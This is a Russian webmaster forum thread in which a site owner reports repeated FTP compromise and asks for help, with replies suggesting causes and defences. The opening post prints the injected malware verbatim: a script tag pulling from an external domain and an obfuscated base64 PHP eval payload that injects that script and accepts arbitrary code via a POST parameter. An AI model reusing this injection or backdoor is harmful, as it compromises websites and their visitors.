X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> взломали Ftp доступ ((((
shtrih
shtrih
Topic Starter сообщение 12.10.2009, 19:01; Ответить: shtrih
Сообщение #1


Бывалый
****

Группа: User
Сообщений: 459
Регистрация: 2.4.2008
Из: Питер
Поблагодарили: 21 раз
Репутация:   6  


Здравствуйте!
Каким то ... уже третий раз мой ftp доступ взламывают и меняют все index.php , index.html
Как защитить себя от этих дебилов? Стоит касперский у меня, но всёровно взламывают.

дописывают строчки в индексы:

1 <script src=http://avtograd-2007.com.ua/images/izumof.php ></script>
2 <?php eval(base64_decode('aWYoIWlzc2V0KCRlejBpbjEpKXtmdW5jdGlvbiBlejBpbigkcyl7aWYocHJlZ19tYXRjaF9hbGwo
JyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNv
d
W50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hX
F
tcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJy
w
kdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGF
y
Q29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgk
d
iwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAk
dilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxz
K
jpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZ
W
dfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNt
bHdkQ0J6Y21NOWFIUjBjRG92TDJGMmRHOW5jbUZrTFRJd01EY3VZMjl0TG5WaEwybHRZV2RsY3k5cGVu
V
nRiMll1Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkc
z
1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLC
c
sYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIGV6MGluMigkYSwkYiwkYywkZCl7Z2xvYmFsICR
l
ejBpbjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGV6MGluMSkpY2FsbF91c2VyX2Z1bmMo
J
GV6MGluMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9J
H
ZbJ25hbWUnXSk9PSdlejBpbicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZW
x
zZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2Nv
bnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdlejBpbicpO2ZvcigkaT0wOyRpPGNvdW50
K
CRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRlejBpbmw9KCgkY
T
1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2V6MGluMicpKSE9J2V6MGluMicpPyRhOjA7ZXZhbChiYXNlNjRfZG
V
jb2RlKCRfUE9TVFsnZSddKSk7')); ?>
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
xton
xton
сообщение 12.10.2009, 19:05; Ответить: xton
Сообщение #2


Оптимизаторр
*****

Группа: Active User
Сообщений: 748
Регистрация: 10.2.2008
Поблагодарили: 178 раз
Репутация:   20  


А как взламывают ? Может у тебя пароль короткий, надо больше 6 символов и использовать регистр и буквы
А может у тебя движек ломаный и в него что то запихано


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
marf
marf
сообщение 12.10.2009, 19:06; Ответить: marf
Сообщение #3


Участник
***

Группа: User
Сообщений: 229
Регистрация: 9.1.2009
Из: Интернет
Поблагодарили: 35 раз
Репутация:   6  


Что я могу сказать, меняйте дырявого хостера.


--------------------
Хостинг intObservatory.ru, качественный бесплатный хостинг с 2006 года.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
shtrih
shtrih
Topic Starter сообщение 12.10.2009, 19:10; Ответить: shtrih
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 459
Регистрация: 2.4.2008
Из: Питер
Поблагодарили: 21 раз
Репутация:   6  


хостер jino.
движок joomla
пароль 10 цифр. буквы и цифры.
По дате изменения посмотрел, все файлы изменены 11.10.2009 примерно в 5 утра

я слышал вирус есть, который пароли к ftp крадёт... так может я его где то словил.. dry.gif

Сообщение отредактировал shtrih - 12.10.2009, 19:12
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
xton
xton
сообщение 12.10.2009, 19:15; Ответить: xton
Сообщение #5


Оптимизаторр
*****

Группа: Active User
Сообщений: 748
Регистрация: 10.2.2008
Поблагодарили: 178 раз
Репутация:   20  


(shtrih @ 12.10.2009, 22:10) *
я слышал вирус есть, который пароли к ftp крадёт... так может я его где то словил..

Не обезательно вирус, могут и так ручками сломать


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Nunkomm
Nunkomm
сообщение 12.10.2009, 19:16; Ответить: Nunkomm
Сообщение #6


Мизантропичный доктор
******

Группа: Active User
Сообщений: 1911
Регистрация: 11.4.2009
Из: Обратной стороны монитора
Поблагодарили: 993 раза
Репутация:   113  


(shtrih @ 12.10.2009, 18:10) *
хостер jino.
движок joomla
пароль 10 цифр. буквы и цифры.
По дате изменения посмотрел, все файлы изменены 11.10.2009 примерно в 5 утра

я слышал вирус есть, который пароли к ftp крадёт... так может я его где то словил.. dry.gif

ТС, этот "взлом" идёт через какого-то из клиентов хостера, расположенного на одном сервере с Вами. Один сайт заражен - и рассылается по внутрисистемнику.


--------------------
Версия 2.0.101. Ещё злее, ещё мизантропичнее.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DJA
DJA
сообщение 12.10.2009, 19:19; Ответить: DJA
Сообщение #7


Бывалый
****

Группа: User
Сообщений: 263
Регистрация: 31.10.2008
Поблагодарили: 59 раз
Репутация:   7  


Через TotalCommander с Вашей машины вирусня может пароли к фтп тырить. Каким фтп-клиентом пользуетесь?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
FABIO
FABIO
сообщение 12.10.2009, 19:26; Ответить: FABIO
Сообщение #8


Завсегдатай
*****

Группа: Active User
Сообщений: 683
Регистрация: 10.4.2008
Из: Москвы
Поблагодарили: 101 раз
Репутация:   18  


Создаёшь на фтп файл .ftpaccess прописываешь в нём свой Ip (инфу можно получить у хостера) и дело в шляпе, доступ к фтп будет разрешён только с твоего Ip.... Удачи!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Nunkomm
Nunkomm
сообщение 12.10.2009, 19:29; Ответить: Nunkomm
Сообщение #9


Мизантропичный доктор
******

Группа: Active User
Сообщений: 1911
Регистрация: 11.4.2009
Из: Обратной стороны монитора
Поблагодарили: 993 раза
Репутация:   113  


(FABIO @ 12.10.2009, 18:26) *
Создаёшь на фтп файл .ftpaccess прописываешь в нём свой Ip (инфу можно получить у хостера) и дело в шляпе, доступ к фтп будет разрешён только с твоего Ip.... Удачи!

А если ip динамический (коих сейчас большинство), то всё только хуже )


--------------------
Версия 2.0.101. Ещё злее, ещё мизантропичнее.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
White_Lad
White_Lad
сообщение 12.10.2009, 19:36; Ответить: White_Lad
Сообщение #10


Завсегдатай
*****

Группа: Active User
Сообщений: 766
Регистрация: 20.12.2008
Поблагодарили: 144 раза
Репутация:   23  


(Nunkomm @ 12.10.2009, 19:29) *
А если ip динамический (коих сейчас большинство), то всё только хуже )


по маске ...
если динамический ... меняются же только последние цыферки... ?! не так ?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Взломали аккаунт Алиекспресс
Внимание мошенники
11 Intersect 423 Сегодня, 15:58
автор: Стэнли
Горячая тема (нет новых ответов) ApiSystem.ru - открытый доступ к Контентному API Яндекс.Маркет
56 zuziken 41156 8.12.2017, 16:50
автор: zuziken
Горячая тема (нет новых ответов) "ВКонтакте" и "Одноклассники" ограничили доступ к музыке
38 MissContent 3235 7.11.2017, 23:06
автор: moneytuz
Открытая тема (нет новых ответов) Disqus залатала дыру, через которые взломали аккаунты в 2012
1 jack 495 9.10.2017, 21:44
автор: harold_may
Открытая тема (нет новых ответов) Дуров рассказал о попытках ФБР получить доступ к данным пользователей Telegram
13 MissContent 1794 17.9.2017, 2:37
автор: darbas


 



RSS Текстовая версия Сейчас: 16.12.2017, 17:07
Дизайн